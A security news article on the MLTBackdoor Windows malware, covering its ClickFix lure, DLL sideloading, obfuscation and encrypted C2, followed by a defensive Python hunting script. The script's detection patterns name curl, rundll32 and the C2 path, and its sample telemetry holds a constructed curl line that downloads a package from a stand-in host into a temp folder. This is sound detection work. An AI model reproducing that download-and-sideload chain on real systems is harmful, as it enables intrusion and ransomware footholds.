MLTBackdoor Malware Uses ClickFix Lures to Gain Access to Windows Systems


Security researchers have uncovered a new Windows backdoor called MLTBackdoor that spreads through a multi-stage ClickFix infection chain and gives attackers a foothold on infected machines.

The malware was identified in May 2026 by Zscaler ThreatLabz, which says MLTBackdoor is likely used by a ransomware-related threat actor. According to the Zscaler ThreatLabz analysis, the backdoor can download and upload files, list directories, delete files, rename items, create folders, and load Beacon Object Files to expand its capabilities.

The attack begins with a ClickFix lure on an automotive-related web page. The victim is tricked into copying and running a command, which starts the full infection chain and eventually loads MLTBackdoor on the system.

MLTBackdoor starts with a ClickFix social engineering trick

ClickFix attacks rely on the user doing the execution for the attacker. A fake error, fake CAPTCHA, or fake fix prompt tells the user to copy and paste a command into Windows Run, Command Prompt, or PowerShell.

This technique is now documented by MITRE ATT&CK as Malicious Copy and Paste, tracked as T1204.004. MITRE says attackers use this method to convince users to run malicious code directly in a command or scripting interpreter.

That social engineering step helps attackers bypass some browser and email protections because the user manually runs the command. Red Canary has also warned that paste-and-run attacks have become a major initial access trend, with several recent threat clusters using ClickFix-style lures.

  • Threat name: MLTBackdoor
  • Discovery: May 2026
  • Reported by: Zscaler ThreatLabz
  • Initial access method: ClickFix lure on an automotive-related web page
  • Main risk: Backdoor access, file operations, and expandable post-exploitation capability
  • Likely use case: Foothold for lateral movement in ransomware-related activity
  • Primary platform: Windows

The infection chain uses a disguised archive and DLL sideloading

After the victim runs the ClickFix command, the chain creates a temporary folder and downloads a compressed archive from a domain generated by the malware’s domain generation algorithm.

The archive contains two files, data.bin and endpointdlp.dll. The DLL decrypts the RC4-encrypted data.bin file, which contains the second-stage MLTBackdoor payload.

MLTBackdoor then performs a self-update and reuses the endpointdlp.dll filename. It sideloads the backdoor through mpextms.exe, a legitimate signed Microsoft Defender executable, which helps the malware hide behind a trusted binary.

  • The lure starts on an automotive-themed web page.
  • The victim copies and runs a fake fix command.
  • The command downloads a compressed archive from attacker infrastructure.
  • endpointdlp.dll decrypts data.bin using RC4.
  • The decrypted payload loads MLTBackdoor.
  • The malware uses mpextms.exe for DLL sideloading.

MLTBackdoor is built to slow down analysis

MLTBackdoor uses several techniques to make reverse engineering harder. It relies on Mixed Boolean-Arithmetic obfuscation, control flow flattening, stack-built strings, API hashing, and indirect system calls.

Zscaler says around 95% of the malware’s code consists of extra calculations that add noise. These calculations serve no functional purpose; they exist only to make the code much harder for researchers and automated tools to understand.

[Figure: MBA obfuscation in MLTBackdoor’s DGA function (Source – Zscaler)]

The backdoor also checks for virtualization, debugging tools, sandbox drivers, low RAM, single-CPU systems, short uptime, and other signs that it may be running in an analysis environment.

Evasion methods and their purpose:

  • Mixed Boolean-Arithmetic: adds unnecessary math operations to hide simple logic
  • Control flow flattening: makes the execution path harder to follow
  • Stack-built strings: prevents simple static string extraction
  • API hashing: hides direct Windows API references
  • Indirect system calls: may bypass user-mode monitoring hooks
  • Anti-analysis checks: collect signals about sandboxes, debuggers, and virtual machines

The backdoor uses encrypted C2 traffic over port 443

Once active, MLTBackdoor communicates over TLS on port 443 using a custom encrypted binary protocol. It uses the fixed path /api/v1/telemetry and a Microsoft-style user-agent string to blend into normal-looking traffic.

The backdoor uses Elliptic-Curve Diffie-Hellman key exchange with the P-256 curve to create a shared secret. It then uses AES-256-GCM to encrypt later messages between the infected host and the command-and-control server.

Some MLTBackdoor samples contain hardcoded C2 domains, while others use a domain generation algorithm. This gives the malware a backup path if defenders block or seize known domains.

Why the BOF loader raises the risk

MLTBackdoor includes built-in commands for basic file system operations, but its Beacon Object File loader makes it more flexible. BOFs allow attackers to run additional post-exploitation modules in memory.

The technical report says this loader can dynamically add new capabilities without needing a large set of features built into the original malware binary.

That design can help attackers keep the backdoor smaller while still expanding what it can do after infection. It also makes detection harder because new functions may run in memory rather than appearing as separate files on disk.

  • Download files from the victim system.
  • Upload files to the victim system.
  • List files in a directory.
  • Delete files or folders.
  • Rename or move files and folders.
  • Create new folders.
  • Load Beacon Object Files for extra post-exploitation tasks.

ClickFix attacks remain hard to stop with basic filtering

ClickFix campaigns work because they turn the user into the execution step. The command may come from a web page, fake CAPTCHA, fake browser error, or document prompt, but the result is the same: the user runs attacker-supplied code.

The Malicious Copy and Paste technique page notes that these attacks can involve fake errors or CAPTCHA prompts that tell users to open a terminal or Windows Run dialog and execute a command.

Red Canary’s ClickFix research also shows how quickly attackers change the commands and payloads used in paste-and-run campaigns. This makes detection rules based on one static command less reliable over time.

Indicators defenders should watch

Security teams should look for suspicious use of conhost.exe, cmd.exe, curl, tar, rundll32, and mpextms.exe in unusual sequences, especially when they run from user profile or temporary directories.

Network monitoring should also flag suspicious TLS traffic to unusual domains with the /api/v1/telemetry path, the Microsoft-Delivery-Optimization/10.1 user-agent string, or connections to domains linked to the campaign.

[Figure: CFF obfuscation in MLTBackdoor’s command-handling function (Source – Zscaler)]

The following indicators come from public MLTBackdoor research and should be treated as starting points for threat hunting, not as the only possible signs of infection.

  • File name endpointdlp.dll: DLL used to decrypt and sideload the backdoor
  • File name data.bin: RC4-encrypted second-stage payload
  • File name mpextms.exe: legitimate Microsoft Defender binary abused for DLL sideloading

How organizations can reduce exposure

Organizations should treat ClickFix as both a technical and training problem. Users need to know that websites should not ask them to paste commands into Windows tools, while security teams need detection for the process chains that follow those prompts.

The Red Canary analysis recommends focusing on behavior because paste-and-run campaigns change quickly. That approach fits MLTBackdoor as well, since the initial command chain, DLL sideloading, and unusual outbound traffic all provide hunting opportunities.

Defenders should also watch for legitimate Microsoft binaries launching unexpected DLLs from temporary folders. That pattern can point to DLL sideloading, especially when it appears after a browser, Run dialog, command prompt, or PowerShell session.

  • Block or monitor suspicious copy-and-paste command execution from browsers.
  • Alert on curl or tar activity launched from unusual user-driven command chains.
  • Monitor rundll32 execution from temporary directories.
  • Watch for mpextms.exe loading DLLs from unexpected paths.
  • Block known MLTBackdoor hashes, domains, and URLs.
  • Inspect TLS traffic patterns that use suspicious user-agent strings or fixed API paths.
  • Train users not to run commands copied from web pages, CAPTCHA prompts, or fake fixes.
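A hunting script covering the process-chain, sideload and network indicators described above, written as an added example for this article (it is not Zscaler’s or Red Canary’s code). It assumes a simplified Sysmon-like event dictionary, a constructed sample of telemetry, and an assumed temp-directory pattern and parent-process list; the binary names, C2 path and user-agent string are the ones the article reports.

```python
import re
# Values from the article: binaries in the chain (conhost.exe omitted as too common), C2 path, user-agent.
SUSPECT_IMAGES = {"curl.exe", "tar.exe", "rundll32.exe", "mpextms.exe"}
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "cmd.exe", "powershell.exe"}
C2_PATH = "/api/v1/telemetry"
C2_USER_AGENT = "Microsoft-Delivery-Optimization/10.1"
# Assumed staging locations: per-user temp folders under the profile, or a bare temp dir.
TEMP_RE = re.compile(r"\\(appdata\\local\\temp|temp|tmp)\\", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Findings for one event. Events are an assumed, simplified Sysmon-like dict:
    type = process | imageload | http, with the fields read below."""
    findings = []
    if ev["type"] == "process":
        image, parent = basename(ev["image"]), basename(ev.get("parent_image", ""))
        in_temp = TEMP_RE.search(ev["image"] + " " + ev.get("command_line", ""))
        if image in SUSPECT_IMAGES and parent in USER_PARENTS and in_temp:
            findings.append(f"{image} launched by user-driven {parent} against a temp directory")
        if image == "mpextms.exe" and TEMP_RE.search(ev["image"]):
            findings.append("mpextms.exe (Defender binary) running from a temp directory")
    elif ev["type"] == "imageload":
        if basename(ev["image"]) == "mpextms.exe" and TEMP_RE.search(ev["loaded_image"]):
            findings.append(f"mpextms.exe loaded {basename(ev['loaded_image'])} from a temp path: sideload")
    elif ev["type"] == "http":
        if ev.get("path") == C2_PATH:
            findings.append(f"fixed MLTBackdoor C2 path {C2_PATH} requested on {ev['host']}")
        # The user-agent mimics a real Microsoft client and is noisy alone; pair it with the path.
        if ev.get("user_agent") == C2_USER_AGENT and ev.get("path") == C2_PATH:
            findings.append("spoofed Delivery Optimization user-agent on the C2 path")
    return findings

def hunt(events):
    """Run every event through check_event; returns [(event_index, finding), ...]."""
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]

# Constructed sample telemetry (not captured from the campaign) mirroring the chain above.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\curl.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"curl -o C:\Users\alice\AppData\Local\Temp\tmpA1\pkg.zip https://example.invalid/p"},
    {"type": "process", "image": r"C:\Users\alice\AppData\Local\Temp\tmpA1\mpextms.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe", "command_line": "mpextms.exe"},
    {"type": "imageload", "image": r"C:\Users\alice\AppData\Local\Temp\tmpA1\mpextms.exe",
     "loaded_image": r"C:\Users\alice\AppData\Local\Temp\tmpA1\endpointdlp.dll"},
    {"type": "http", "host": "example.invalid", "path": C2_PATH, "user_agent": C2_USER_AGENT},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe"},
]
```

Running hunt(SAMPLE_EVENTS) flags the curl download into the temp folder, the Defender binary executing from that folder, the DLL it loads from there, and the C2 request, while the notepad event produces nothing.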

MLTBackdoor shows how ClickFix attacks can move from a simple user prompt to a full post-exploitation framework. The campaign combines social engineering, DLL sideloading, heavy obfuscation, encrypted C2, DGA fallback, and in-memory expansion through BOFs, making early detection especially important.

FAQ

What is MLTBackdoor malware?

MLTBackdoor is a Windows backdoor identified by Zscaler ThreatLabz in May 2026. Researchers say it is likely used by a ransomware-related threat actor to establish a foothold, move laterally, and expand capabilities through a Beacon Object File loader.

How does MLTBackdoor infect systems?

MLTBackdoor uses a multi-stage ClickFix infection chain. A fake prompt tricks the victim into copying and running a command, which downloads an archive, decrypts a hidden payload, and loads the backdoor through DLL sideloading.

What makes MLTBackdoor hard to analyze?

MLTBackdoor uses Mixed Boolean-Arithmetic obfuscation, control flow flattening, stack-built strings, API hashing, indirect system calls, and multiple anti-analysis checks. These techniques make static and dynamic analysis harder.

What can MLTBackdoor do after infection?

MLTBackdoor can download and upload files, list directories, delete files or folders, rename or move items, create folders, and load Beacon Object Files to add more post-exploitation capabilities.

How can organizations detect MLTBackdoor activity?

Organizations should monitor for suspicious ClickFix-style command execution, unusual use of curl, tar, rundll32, and mpextms.exe, DLL sideloading from temporary paths, outbound traffic to known MLTBackdoor domains, and TLS traffic using unusual fixed paths or user-agent strings.
